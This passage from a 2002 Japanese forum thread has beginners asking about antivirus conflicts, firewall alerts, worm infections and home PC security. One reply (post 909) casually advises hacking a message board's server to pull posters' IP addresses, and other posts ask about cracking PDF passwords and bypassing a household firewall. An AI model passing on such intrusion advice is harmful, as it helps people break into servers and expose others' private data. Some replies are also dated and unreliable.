854 :ウイルスバスター2002使用者:02/01/12 19:46
ウイルスバスター2002使用者です。
トレンドマイクロ社のHPを調べたのですが、ちょっとわからないのでここで質問させてください。
NTTの フレッツADSLを使用しています。
フレッツ接続ツール画面が起動するのにやたらと時間がかかります。
以前”通信速度が低下する”という話がありましたが、これとは別で回線速度が下がるのではなく
フレッツ接続ルーツ画面を開くのが遅い、接続プロバイダのアイコンを
クリックするまで時間がかかる。
といった症状です。
どなたかそのような経験はありませんか?
よければ教えてください。

855 : :02/01/12 19:51
>>854
うちノートンだけど全く同じ状況だよ。
サービス開始のタイミングが変わってしまって、ネットワーク接続が必要なサービスより後になっちゃうんだよね。
うちはフレッツ接続ツールあきらめて、raspppoeっての入れてそっちで接続するように変えました。

856 :854:02/01/12 19:56
854です。
早速の回答ありがとうございます。
ウイルスバスターだけでなく、アンチウイルス系ではみんなそうなってしまうんですね。
勉強になりました。rasppoe ですか?初耳ですが、調べてみます。
ありがとうございました。

857 :848 ◆Np/FxuF6 :02/01/12 21:02
>>851
そんなものがあるんですか!?
…たしかに、アップローダのアドレス入れるとダメだったンで、
直リン禁止用か、要注意モノだったのかもしれませんね…
どうも、ありがとうございました。 (きもっち晴れば〜れ♪)

858 :名無しさん@お腹いっぱい。:02/01/12 23:38
テレホあげ

859 :名無しさん@お腹いっぱい。:02/01/12 23:42
すみません

さっきからZone Alamrmが
ZoneAlarm blocked data sent over the Internet
to port 1108 on your machine from port 53
on a remote computer whose IP address is 211.0.138.67.
としつこく言ってるんですけど、放置しておいてもよろしいのでしょうか?

なにぶん初心者なもので。宜しくお願いします。

860 :名無しさん@お腹いっぱい。:02/01/12 23:55
>>859
ZoneAlarmは、そのIPアドレスが211.0.138.67である遠隔の
コンピューター上のポート53からのあなたの機械上で1108を
運ぶためにインターネット上に送られたデータを閉鎖しました。

861 :だれ?:02/01/12 23:58
リモートアドレス:61.144.145.34:1585から接続しようとしてる奴がいるけど
だれ?

862 :名無しさん@お腹いっぱい。:02/01/13 00:04
>>861
チャイニーズ

863 :名無しさん@お腹いっぱい。:02/01/13 00:08
では211.0.138.67はだれ?

864 :861:02/01/13 00:13
>>862
さんきゅ!
ノートンで拒否してれば大丈夫だな

865 :名無しさん@お腹いっぱい。:02/01/13 00:19
>>859
日本語化しる!
ttp://www.ryulife.com/net/zonealarm.html

866 :名無しさん@お腹いっぱい。:02/01/13 00:30
>>860
>>865

いや、言ってる意味はわかるんですけど、
あんまりしつこいから放って置いてもいいのかなと思いまして。

867 :名無しさん@お腹いっぱい。:02/01/13 00:34
>>866
プロバはaccsnetなの?

868 :名無しさん@お腹いっぱい。:02/01/13 00:35
ヘタにこちらから何かすると…

869 :名無しさん@お腹いっぱい。:02/01/13 00:47
質問あります、、
今度、ISDNにする事になったのですが、ターミナルアダブターという物が
必要らしいのですが、たくさん種類があり、全くどれがいいか見当がつきません
どれにしたらいいんでしょうか?

870 :名無しさん@お腹いっぱい。:02/01/13 01:55
>>869
プロバイダーのホームページ(FAQなど)に接続実績のある
TAが紹介されていることが多いよ。
(板違いネタだね)

871 :名無しさん@お腹いっぱい。:02/01/13 02:14
了解です、ありがと。

872 :名無しさん@お腹いっぱい。:02/01/13 03:25
Win98SEなんだけど、エクスプローラーのHドライブ(CD−Rドライブ)
の下にH:って奴が2つできてるんだけどこれってウィルスかな?
,docの書類(ワードパッドとかの)のアイコンが付いてるんだが・・。
でもこれといって変な症状は無いんだけど。
誰か分かる人いたら教えてくれ。

873 : :02/01/13 03:29
WORM GOP Aっていうウィルスに感染してしまいました。
オンラインスキャンして解ったんですが、駆除不可能です。しかも
http://inet.trendmicro.co.jp/virusinfo/isp/default3.asp?VName=WORM_GOP.A
のとおり「検索条件に一致するウイルス情報はありません。 」だそうです。
感染経路は多分数日前に来た中国語のメールからだと・・・
実感できる被害はまだないですけど、だれか対処法を教えてください!
お願いします!

874 : >873 :02/01/13 03:42
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_GOP.A

875 :名無しさん@お腹いっぱい。:02/01/13 03:50
ノートンのFWを入れたら2CHブラウザ(ぞぬ、かちゅ〜しゃ)が使えなくなりました。
セキュリティのチェックをはずすか、FW自体を終了させると使えるようになります。

できればどなたかFWの設定の仕方を、教えていただけませんでしょうか?

876 :873:02/01/13 03:52
>>873ありがとうございます!!マジで感謝!

877 : :02/01/13 03:54
>>875
ノートンのスレッドにいって、1を見てみて下さい。

878 :873:02/01/13 03:56
間違えた!
>>874に感謝です。

879 :助けて!:02/01/13 06:28
ウイルスと思われますが、踏んでしまいました。
ウイルスバスターは起動中でしたが、大丈夫でしょうか?
不安です。
どうすれば良いでしょうか?教えてください。
ttp://www.top.or.jp/~godhand/a2.html

880 :名無しさん@お腹いっぱい。:02/01/13 06:55
>>879
気にしなくていいよ

881 :名無しさん@お腹いっぱい。:02/01/13 06:56
サンキュウです。
安心しました。

882 :866:02/01/13 11:30
亀レスですみません(今起きました)
>>867
そうです。
では211.0.138.67は
同じLANの中の人ってことでしょうか?

883 :名無しさん@お腹いっぱい。:02/01/13 13:13
ADSLで常時接続になったのですが、PCの電源を切っているときは
セキュリティのことは考えなくていいのでしょうか?
電源切っているときは、ゾーンアラームも動いていないわけですし。。

884 :名無しさん:02/01/13 13:51
>>883
1993年に、コロンビアの麻薬王パブロ・エスコバルの居場所が突き止められたのは
一部は携帯電話の利用データをもとにしたからだ
これはピンポインティングと呼ばれる技法だ。

885 :名無しさん@お腹いっぱい。:02/01/13 15:15
昔、雑誌で見たことあるんですけど
家庭用の指紋照合システムって、今でも売ってるんでしょうか?
個人向けに発売されたもので、さほど高くないと聞きました。
指紋が一致しなければ、PCを起動できないんだそうです。
あったら、ぜひ買いに行きたいです。
それとも、もうお店には無いんでしょうか?
・・・パソコン屋のどこの売り場に行けばいいのかな?

そのうちノートPCに内蔵させるために合体させたいです。(私には無理ですが)

886 :名無しさん:02/01/13 15:21
>>885
エシュロンみたいなシステムの核心にはすべて
トラフィックパターンの詳細なデータベースがあるのはまちがいない。
ほとんどの通信が暗号化されていない世界では
暗号化された通信はたぶんそれだけで確実に記録保存されるだろう。
通話者が傍受されたがっていないということを示唆しただけで
十分に警戒すべき存在と見なされるだろうから。

887 :名無しさん@お腹いっぱい。:02/01/13 15:30
俺には>>885>>886がつながらんのだが。

888 :初心者:02/01/13 15:48
皆さん、何で調べてIPアドレスからアクセス元をサクっと割り出しているのですか?
なんかそんな事ぐらい、やっとかなきゃいけないのかな、と思ってしまいました。

889 :名無しさん@お腹いっぱい。:02/01/13 16:00
>>888
IPドメインのサーチサイトがある

>886=884 さん
オモロイな。

890 :名無し:02/01/13 17:17
NISを使っていてJS.Exception.Exploitというウイルスに感染してしまいましたが
駆除できません。ウイルス定義は1/9です。どうしたら良いのか教えてください

891 :age:02/01/13 17:19
PDFのパスワードクラックってどうすれば?

892 :名無しさん@お腹いっぱい。:02/01/13 17:38
>>890
すべてのファイルがスキャン対象
として設定されているか確認→システム全体のスキャン
出てきたの全部削除

893 :名無し:02/01/13 17:51
>>892さんありがとうございます。さっそくやってみます

894 :885:02/01/13 20:11
家庭用指紋照合システムって、やっぱり使ってる人いないのかな?
自分以外にPCをさわらせたくない時なんか
かなり有効だと思うんですけど・・・。
ウィンドウズを起動する時にパスを必要とする方法なんか
簡単に突破されてしまいますし・・・。

895 :名無しさん@お腹いっぱい。:02/01/13 20:27
>>894
そこまでして隠したい物とは何ですか?

896 : :02/01/13 20:29
>>895
それは人それぞれでしょう(笑)

897 :885=894:02/01/13 20:55
>895
PCの中身全てです。
別に変なものがあるわけではなく、プライバシーの問題です。
もともと、セキュリティ意識が高いほうなので
気になるんです。

まあ、一番大事なのは、メール、次に大事なのは文書ファイル。
何がなんでも、自分以外の人にPCをさわらせたくは無いんです。
似たようなソフトでも、買ったほうがよいのでしょうか?
自分以外はPCを使えなくするソフトがあるって、聞いた事があります。

898 :名無しさん@お腹いっぱい。:02/01/13 21:17
>>897
えっと、もすこし自分以外を信じたら?
↓一応ね
http://www.vector.co.jp/vpack/filearea/win/util/security/login/index.html

899 :名無しさん@お腹いっぱい。:02/01/13 22:25
>>897
恥ずかしいポエムとかオナニー日記でもつけてるのか?(w

900 :名無しさん@お腹いっぱい。:02/01/13 22:42
むちゃくちゃ初歩ですみませんが……
ADSLのルーター型モデムって、ある程度安全なのですか?(ちなみにACCA、富士通8M)。
ちょっと不安なのですが……

901 : :02/01/14 04:29
>>900
ある程度安全です。

902 :名無しさん@お腹いっぱい。:02/01/14 05:03
掲示板(PC携帯共用)の書き込み者のIP見る方法教えてください。
偽者の判別にすごく困ってるんです。おかげで掲示板で信用失うし。
自分のIPまで暴かれました。色々検索してみたけど全然わかりません。
決して悪用するつもりはないのでよろしくお願いします。
そういう情報のあるサイトを教えていただくだけでも結構です。

903 : :02/01/14 05:11
>>902
どこのサイトなのか使ってるcgiはなんなのか書けよ。
たいていの場合、特殊な環境でIPばらされたら、犯人はそこの管理人だよ。

904 :名無しさん@お腹いっぱい。:02/01/14 05:19
次スレhttp://pc.2ch.net/test/read.cgi/sec/1010952801/l50

950になったら徐々に移行してください

905 :名無しさん@お腹いっぱい。:02/01/14 05:57
ニュース受信中にウィルス監視してくれるアンチウィルスソフトはないですか?

906 :名無しさん@お腹いっぱい。:02/01/14 12:25
age

907 : 1000!!!!!:02/01/14 14:25
 

908 :第三者中継可能?:02/01/14 14:26
From:"SaveBig"< savebig@savebig8.sparklist.com >
To: leave-savebig-2158367U@savebig8.sparklist.com
Subject:Get the Credit You Deserve!
Date:**
Received:from [207.250.144.213]by sparklist.com
with ESMTP id leave-savebig-2158367U
From bounce-savebig-2158367@savebig8.sparklist.com
List-Unsubscribe:
< mailto:leave-savebig-2158367U@savebig8.sparklist.com >
-----
You are currently subscribed to savebig as: savebig@savebig8.sparklist.com
To unsubscribe send a blank email to mailto:leave-savebig-2158367U@savebig8.sparklist.com

909 :名無しさん@お腹いっぱい。:02/01/14 14:39
>>902
今日だけ特別に教えてやろう。

まずソースを見ろ、コメントで埋め込んであることがある。
それで駄目なら、その掲示板の配布元を調べてデータファイルのデフォルト名を探せ。
readme.txt,README.txtをあさってみるのも良いだろう。
それでも駄目なら鯖をハクしろ、共有鯖ならそこのアカウントを取って内部から穿る。
鯖のOSが判ったらハクツールあさるか、セキュリティ勧告を元にハクしろ。
>>902が女ならば鯖を管理しているISPの従業員の前でパンツを脱ぐのが一番確実だ。

910 : :02/01/14 14:53
>>909
最後の一行に惚れた(笑)。

911 :名無しさん@お腹いっぱい。:02/01/14 18:19
ソーシャルハクの基本にして最高確実なワザだ<パンツ脱ぐ

912 :M●N逝ってヨシ!:02/01/14 20:05
マイクロソフトとオフィス2000の修正プログラムを
ダウンロードしたら、IEを立ち上げ時の初期ページが
MSNのHPに変わってしまいました。
設定を変更して、再度立ち上げてもMSNが出てきます。
あと、検索をクリックするとエロサイトのHPらしき画面が
勝手にでてきた。プログラムが書き換えられたと思う。
さんざん外出だろうけど、直す方法知ってる人いますか?

913 :名無しさん@お腹いっぱい。:02/01/14 20:11
>>912
自分のスレを片付けろよ 厨房

914 :902:02/01/14 21:01
>909
ありがとうございます!ISPの従業員がホモならパンツ脱ぎます(笑)
とりあえず挑戦してみますが、またわからなかったら質問させてください!
感謝!

915 :名無しさん@お腹いっぱい。:02/01/14 21:02
>>912
おまえがエロいからアダルトサイトにつながるんだ。
まずは煩悩を振りはらえ。

916 :不明なデバイスさん:02/01/14 22:27
EverQuestをやろうとしたらファイアーウォールに引っかかって
ログオンできないのですがrootパスワードも何も無いのですが
できるようにする方法ありますか?
家にはわけのわからん兄貴構築のUNIXサーバー(ルーター&DHCP)

どうしても設定を変えてくれないので何方か方法知ってましたら
教えてください。(EverQuestをやるのに必要なポートはわかって
います)  やっぱむりかな・・・。

917 : :02/01/14 22:45
兄貴を殺す

以上。

918 :名無しさん@お腹いっぱい。:02/01/14 23:03
>>916
自分でもう1回線引く。

919 : 1000!!!!!:02/01/14 23:26
 

920 : 1000!!!!!:02/01/14 23:27
  

921 :名無しさん@お腹いっぱい。:02/01/14 23:28
   

922 :名無しさん@お腹いっぱい。:02/01/14 23:28
>>916
ルータの前にルータ設置して横流し(高くて楽
ルータマシンにNICを1枚足して横流し(安くて難

923 : 1000!!!!!:02/01/14 23:28
    

924 :初心者:02/01/15 00:37
数日前、件名がRe:というメールが来ました。プレビューウインドウで見ましたが、何も書いてありませんでした。メールソフトはOE5.5で、SP2には更新していません。
添付は開いていないのですが。どうなんでしょうか? 心配になってシマンテックとトレンドマイクロのオンラインウイルス検索をしましたが大丈夫でした。
本当に大丈夫なんでしょうか。

925 :名無しさん@お腹いっぱい。:02/01/15 00:48
>>924
さっさとSP2当てなさい
添付ファイル開かなくても、プレビューしただけで感染だよ

926 :名無しさん@お腹いっぱい。:02/01/15 00:49
>>924
バッドトランスだよ
もろ感染してるよ! 早く回線切って寝ろ!
明日対策ソフト買ってこい!

927 :名無しさん@お腹いっぱい。:02/01/15 01:00
IPv6-IPv4ネットワーク間でのファイアウォールを構築したいのですが、
構築するためにはどのようにすればよいか教えてください!
現在、FreeBSDでv6/v4デュアルスタックルータとしてネットワークを
構築しています。
よろしくお願いします。

928 :初心者2:02/01/15 01:05
ウィルスバスターのファイアーウォールで「トロイの木馬ブロック」
でウィルス名が「Sub Seven」「Net Bus」と表示されています。
これは防げたけど、トロイをしかけられてた・・・ということなの
でしょうか??頻繁にこの「Sub Seven」や「Net Bus」を防いだと
いうログが残っています・・・
どなたかご存知の方、教えていただけないでしょうか。

929 :名無しさん@お腹いっぱい。:02/01/15 01:22
>>927
参考までに
http://pc.2ch.net/test/read.cgi/sec/1010998014/40n

930 :名無しさん@お腹いっぱい。:02/01/15 01:24
>>928
外側からなのか、内側からなのかで違うよ。

931 : 1000!!!!!:02/01/15 01:34


932 : 1000!!!!!:02/01/15 02:53
スキャンされただけでは?

933 :名無しさん@お腹いっぱい。:02/01/15 06:40
age

934 :名無しさん@お腹いっぱい。:02/01/15 17:20
>>928 >>930
ウイルスバスターのFWということはアンチウイルス機能も
同時に常駐してると考えるのが自然ですね。
つまり内側からパケット送信してる時点でトロイ検出してなきゃ
ウイルスバスターは糞だということに…!

935 : :02/01/15 18:23
ノートン入ってれば不正アクセスは「絶対に」遮断できる?

936 :名無しさん@お腹いっぱい。:02/01/15 18:24
全然

937 : :02/01/15 19:05
>>935
ちょっとでも脳味噌使えば
「ノートンの対策が先か、ウイルスやトロイや不正行為が先か」
がわかると思うんだけどなぁ。

938 :>935 セキュリティベンダーに騙されています。:02/01/15 19:08
常時接続の時代が到来して、個人のPCのセキュリティについていろいろな
ところで取り上げられています。そして、多くの人たちが自分の
インターネット環境のセキュリティに関心を持ちはじめています。
これは、とても良いことでです。でも、
何か勘違いをしていませんか
セキュリティベンダーに騙されていませんか?

ルータでブロックする
coregaなどで販売しているブロードバンド用のルータはとても便利です。
IPマスカレードで利用すればデフォルト状態でも基本的に外部からの
不要なパケットを通しません。値段も14000円程度なので是非導入してください。
パーソナルファイアーウォールソフトでブロックする <要注意>おすすめしません!!
パーソナルファイアーウォールソフトウエアでブロックする方法を
セキュリティソフトウエアベンダーはPRしていますが、これは危険です。
もちろん外側にルータがあればよいですが、ソフトウエアだけの場合は、
悪意のあるパケットは確実にあなたのPCにまで到達しています。
そして、このパーソナルファイアーウォールソフトウエア自体が、
不要なサービスの一つであり使用不能攻撃の対象になってしまいます。
もちろんルータとの併用ならOKです。

939 :名無しさん@お腹いっぱい。:02/01/15 19:56
win98で、対象を1回ヒダリクリックするとプレビューが見れますが、
これでもバットトランスに感染してしまいますか?

いつの間にか感染してたもので・・・。
心当たりは、上に書いたことをメールで到着したバットトランスを削除するときに
やったくらいなんですけど・・。

940 :名無しさん@お腹いっぱい。:02/01/15 20:00
>>938
わざわざそんなコピぺしなくても、
p-sec.netのURLを貼ったらいいのでは?

941 :名無しさん@お腹いっぱい。:02/01/15 20:07
>>939
Ie5 Ie5.5 sp2 DirectAction のパッチの
有無がカギで感染するかどうかは別の話。

とりあえずプレビューと開くは同じこと。
よくわからなければ、ウイルス対策ソフト入れなさい。

942 :名無しさん@お腹いっぱい。:02/01/16 17:45
2、3日前からパソコンを起動・終了する度にAドライブにアクセスします。
あとIEのログが何故か消えていました。
他に実害はないのですが、これはウイルスでしょうか?
ノートンやオンラインスキャンでは問題なしになります。

943 :名無しさん@お腹いっぱい。:02/01/16 18:09
>>942
2,3日前からノートンを入れたんじゃないですよね〜?

944 :942:02/01/16 18:28
ノートンは以前から入っていました。

945 :名無しさん@お腹いっぱい。:02/01/16 18:47
>>942
それは、いろいろ原因があるから一概にはいえないね〜。
とりあえずヒントはこんなかんじ。
  ↓
・フロッピーのファイルへのショートカット。
・OFFICEの"Find Fast"
・ノートンのブートセクタ検査

946 :名無しさん@お腹いっぱい。:02/01/16 19:01
(徐々に移行)

■ 初心者用質問スレッド Part6 ■
http://pc.2ch.net/test/read.cgi/sec/1010952801/l50

947 :名無しさん@お腹いっぱい。:02/01/16 19:18
>>942
「最近使ったファイル」のパスにAドライブがあるのかも

スタート>設定>タスクバーとスタートメニュー>スタートメニューの設定
>最近使ったファイル>クリア

でどうだろう

948 :942:02/01/16 20:49
>>945
有難うございます。
ですが思い当たる事がないので何とも・・・。
あ、OSはXPです。

>>947
有難うございます。
早速試してみましたが、まだAドライブにアクセスするようです。
「windows\system32\svchost.exeがインターネットにアクセスしようとしています」
とノートンが警告するのですが、これは無関係でしょうか?

949 :名無しさん@お腹いっぱい。:02/01/16 21:04
>>948
http://www.fs-support.yamada.co.jp/df/v-descs/v-descs2/codeblue.htm

950 :942:02/01/16 21:17
>>949
有難うございました。
codeblue・・・ですか。
起動時に必ずアクセスするのでおかしいと思いました。

どのように駆除したら良いのでしょうか。
是非教えて戴けないでしょうか。お願いします。

951 :名無しさん@お腹いっぱい。:02/01/16 21:25
>>950
何いってる。
windows\system32\svchost.exe は標準システムファイルだぞ。
codeblueならC:\svchost.exe だ。

952 :942:02/01/16 21:39
>>951
そうなのですか。
ですが起動時に盛んにアクセスしますが・・・。

953 :名無しさん@お腹いっぱい。:02/01/16 22:00
MCウィルスのアップデートすると何故か知らないがレジストリー
負荷掛かって自動で起動できません。レジストリーを手動で
削除して軽くしないと出来ないけど、これってわしだけ?

954 :MCウイルスって何?:02/01/16 22:03
 

955 :名無しさん@お腹いっぱい。:02/01/16 22:23
>>954 mcafee viresのアップデートで不具合出るのです。
何故にアップデートするだけで、PCが立ち上げ不能
セーフモード起動でやっとさ〜最初の画面で立ち上がる・・・
これって、わしだけの現象?かな?

956 :名無しさん@お腹いっぱい。:02/01/16 22:44
>>955
ここにお仲間がイッパイいるよ。
 ↓
http://pc.2ch.net/test/read.cgi/sec/1007480057/l50

957 :名無しさん@お腹いっぱい。:02/01/17 12:09
356アンクス( ´∀`)ノ

958 :名無しさん@お腹いっぱい。:02/01/17 21:22
>>942
ひょっとしたらひょっとするかもね…。↓
http://pc.2ch.net/test/read.cgi/sec/1001662997/768-772
万が一に備えて確認をお勧め。


959 : 1000!!!!!:02/01/17 23:34


960 :名無しさん@お腹いっぱい。:02/01/20 13:02
■ 初心者用質問スレッド Part6 ■  
http://pc.2ch.net/test/read.cgi/sec/1010952801/l50

961 :名無しさん@お腹いっぱい。:02/01/26 14:54
 

962 :名無しさん@お腹いっぱい。:02/01/26 14:54



963 :名無しさん@お腹いっぱい。:02/01/26 14:54
 


964 :名無しさん@お腹いっぱい。:02/01/26 14:54
■ 初心者用質問スレッド Part6 ■
http://pc.2ch.net/test/read.cgi/sec/1010952801/

965 :名無しさん@お腹いっぱい。:02/01/26 14:55
■ 初心者用質問スレッド Part6 ■
http://pc.2ch.net/test/read.cgi/sec/1010952801/


966 :名無しさん@お腹いっぱい。:02/01/27 09:35
 

967 :名無しさん@お腹いっぱい。:02/01/27 09:35



968 :名無しさん@お腹いっぱい。:02/01/27 09:35
 


969 :名無しさん@お腹いっぱい。:02/01/27 09:35
■ 初心者用質問スレッド Part6 ■
http://pc.2ch.net/test/read.cgi/sec/1010952801/

970 :名無しさん@お腹いっぱい。:02/01/27 09:35
■ 初心者用質問スレッド Part6 ■
http://pc.2ch.net/test/read.cgi/sec/1010952801/


971 :名無しさん@お腹いっぱい。:02/01/27 09:37
まもなくここは 乂1000取り合戦場乂 となります。

      \∧_ヘ     / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
 ,,、,、,,, / \〇ノゝ∩ < 1000取り合戦、いくぞゴルァ!!       ,,、,、,,,
    /三√ ゚Д゚) /   \____________  ,,、,、,,,
     /三/| ゚U゚|\      ,,、,、,,,                       ,,、,、,,,
 ,,、,、,,, U (:::::::::::)  ,,、,、,,,         \オーーーーーーーッ!!/
      //三/|三|\     ∧_∧∧_∧ ∧_∧∧_∧∧_∧∧_∧
      ∪  ∪       (    )    (     )   (    )    )
 ,,、,、,,,       ,,、,、,,,  ∧_∧∧_∧∧_∧ ∧_∧∧_∧∧_∧∧_∧
      ,,、,、,,,       (    )    (    )    (    )    (    )

972 :名無しさん@お腹いっぱい。:02/01/27 10:02
 

973 :名無しさん@お腹いっぱい。:02/01/27 10:03



974 :名無しさん@お腹いっぱい。:02/01/27 10:03
 


975 :埋め立て屋:02/01/27 10:03
■ 初心者用質問スレッド Part6 ■
http://pc.2ch.net/test/read.cgi/sec/1010952801/

976 :埋め立て屋:02/01/27 10:03
■ 初心者用質問スレッド Part6 ■
http://pc.2ch.net/test/read.cgi/sec/1010952801/


977 :埋め立て屋:02/01/27 10:35
 

978 :名無しさん@お腹いっぱい。:02/01/27 10:35



979 :名無しさん@お腹いっぱい。:02/01/27 10:35
 


980 :名無しさん@お腹いっぱい。:02/01/27 10:55
 

981 :名無しさん@お腹いっぱい。:02/01/27 10:55



982 :名無しさん@お腹いっぱい。:02/01/27 10:55
 


983 :名無しさん@お腹いっぱい。:02/01/27 11:07
 

984 :名無しさん@お腹いっぱい。:02/01/27 11:07



985 :名無しさん@お腹いっぱい。:02/01/27 11:07
 


986 :名無しさん@お腹いっぱい。:02/01/28 08:56
 

987 :名無しさん@お腹いっぱい。:02/01/28 08:57



988 :名無しさん@お腹いっぱい。:02/01/28 08:57
 


989 :名無しさん@お腹いっぱい。:02/01/28 08:57
■ 初心者用質問スレッド Part6 ■
http://pc.2ch.net/test/read.cgi/sec/1010952801/

990 :名無しさん@お腹いっぱい。:02/01/28 08:57
■ 初心者用質問スレッド Part6 ■
http://pc.2ch.net/test/read.cgi/sec/1010952801/


991 :名無しさん@お腹いっぱい。:02/01/28 08:57
991

992 :名無しさん@お腹いっぱい。:02/01/28 08:57
992


993 :名無しさん@お腹いっぱい。:02/01/28 09:10
 

994 :名無しさん@お腹いっぱい。:02/01/28 09:10



995 :名無しさん@お腹いっぱい。:02/01/28 09:10
 


996 :名無しさん@お腹いっぱい。:02/01/28 09:11
996

997 :名無しさん@お腹いっぱい。:02/01/28 09:11
997


998 :名無しさん@お腹いっぱい。:02/01/28 09:11
■ 初心者用質問スレッド Part6 ■
http://pc.2ch.net/test/read.cgi/sec/1010952801/

999 :埋め立て屋:02/01/28 09:11
999ゲト

1000 :埋め立て屋 ◆Liz4zQaI :02/01/28 09:12
1000です。。。

1001 :1001:Over 1000 Thread
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。

251 KB
★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.02 2018/11/22 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)